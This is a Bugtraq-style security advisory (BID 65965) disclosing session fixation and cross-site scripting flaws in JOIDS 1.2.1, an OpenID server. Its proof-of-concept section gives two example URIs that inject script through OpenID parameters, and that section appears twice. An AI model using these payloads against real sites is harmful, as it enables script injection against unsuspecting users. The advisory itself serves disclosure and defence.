JOIDS Session Fixation and Cross Site Scripting Vulnerabilities
BID:65965
Info
JOIDS Session Fixation and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 65965 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 04 2014 12:00AM |
| Updated: | Mar 04 2014 12:00AM |
| Credit: | Bartlomiej Balcerek |
| Vulnerable: |
JOIDS JOIDS 1.2.1 |
| Not Vulnerable: | |
Exploit / POC
JOIDS Session Fixation and Cross Site Scripting Vulnerabilities
An attacker can use a browser to exploit these issues. To exploit some of the issues, the attacker needs to entice a user to follow a malicious URI.
The following example URIs are available:
https://www.example.com/server?<removed_attributes>&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select"><img%20src%3da%20onerror%3dalert("XSS")><
https://www.example.com/server?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.realm=https://<SCRIPT>alert("XSS")</SCRIPT>/&openid.return_to=https://<SCRIPT>alert("XSS")</SCRIPT>&<removed_attributes>
An attacker can use a browser to exploit these issues. To exploit some of the issues, the attacker needs to entice a user to follow a malicious URI.
The following example URIs are available:
https://www.example.com/server?<removed_attributes>&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select"><img%20src%3da%20onerror%3dalert("XSS")><
https://www.example.com/server?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.realm=https://<SCRIPT>alert("XSS")</SCRIPT>/&openid.return_to=https://<SCRIPT>alert("XSS")</SCRIPT>&<removed_attributes>
Solution / Fix
JOIDS Session Fixation and Cross Site Scripting Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].